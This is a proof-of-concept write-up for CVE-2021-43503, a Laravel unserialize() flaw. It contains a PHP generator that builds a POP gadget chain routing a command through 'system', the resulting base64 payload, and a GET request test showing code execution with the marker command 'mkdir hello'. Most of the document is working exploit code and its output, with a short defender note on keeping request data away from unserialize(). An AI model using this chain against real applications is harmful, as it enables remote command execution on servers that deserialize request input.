This is about CVE-2021-43503.
- PHP >= 8.0
- Composer
-
Startup service
composer install
cp .env.example .env
php artisan key:generate
php artisan serve   # the service listens on port 8000 on localhost
-
Encode the POP chain
<?php
// Generator for the serialized object graph used in this CVE-2021-43503 write-up.
//
// The classes below are local stand-ins that reuse the framework's class and
// property names so that serialize() emits those names. None of the framework's
// own code is loaded or executed by this script; it only prints a string.
//
// Defender note: the printed string has an effect only when an application
// passes it to unserialize(). Keeping request data away from unserialize()
// (json_decode(), or unserialize($data, ['allowed_classes' => false])) removes
// that entry point regardless of which classes are installed.

namespace Illuminate\Contracts\Queue {
    // Empty marker interface, declared only so BroadcastEvent can implement it.
    interface ShouldQueue
    {
    }
}

namespace Illuminate\Bus {
    // Stand-in with the same five protected properties, in the same order,
    // so the serialized property list matches what the script originally emitted.
    class Dispatcher
    {
        protected $container;
        protected $pipeline;
        protected $pipes = [];
        protected $handlers = [];
        // Holds the name of a PHP function as a plain string.
        // NOTE(review): the framework class presumably expects a callable here;
        // confirm against the framework source for the affected version.
        protected $queueResolver = "system";
    }
}

namespace Illuminate\Broadcasting {
    use Illuminate\Contracts\Queue\ShouldQueue;

    // Stand-in event; it declares no properties of its own.
    class BroadcastEvent implements ShouldQueue
    {
    }

    // Outer object of the graph: one Dispatcher stand-in plus one event stand-in.
    class PendingBroadcast
    {
        protected $events;
        protected $event;

        public function __construct()
        {
            $broadcast = new BroadcastEvent();
            // Marker command used by the write-up: it creates a directory named
            // "hello", which is what the test at the end of the page looks for.
            $broadcast->connection = "mkdir hello";

            $this->event = $broadcast;
            $this->events = new \Illuminate\Bus\Dispatcher();
        }
    }
}

namespace {
    // Serialize the graph and base64-encode it so the NUL bytes that mark
    // protected properties survive being copied into a request.
    $chain = new \Illuminate\Broadcasting\PendingBroadcast();
    echo base64_encode(serialize($chain));
}
It outputs the following:
Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MjU6IklsbHVtaW5hdGVcQnVzXERpc3BhdGNoZXIiOjU6e3M6MTI6IgAqAGNvbnRhaW5lciI7TjtzOjExOiIAKgBwaXBlbGluZSI7TjtzOjg6IgAqAHBpcGVzIjthOjA6e31zOjExOiIAKgBoYW5kbGVycyI7YTowOnt9czoxNjoiACoAcXVldWVSZXNvbHZlciI7czo2OiJzeXN0ZW0iO31zOjg6IgAqAGV2ZW50IjtPOjM4OiJJbGx1bWluYXRlXEJyb2FkY2FzdGluZ1xCcm9hZGNhc3RFdmVudCI6MTp7czoxMDoiY29ubmVjdGlvbiI7czoxMToibWtkaXIgaGVsbG8iO319
-
Test with an HTTP GET request:
It successfully created the directory hello/ in public/, which implies that the test application passes the request value to unserialize().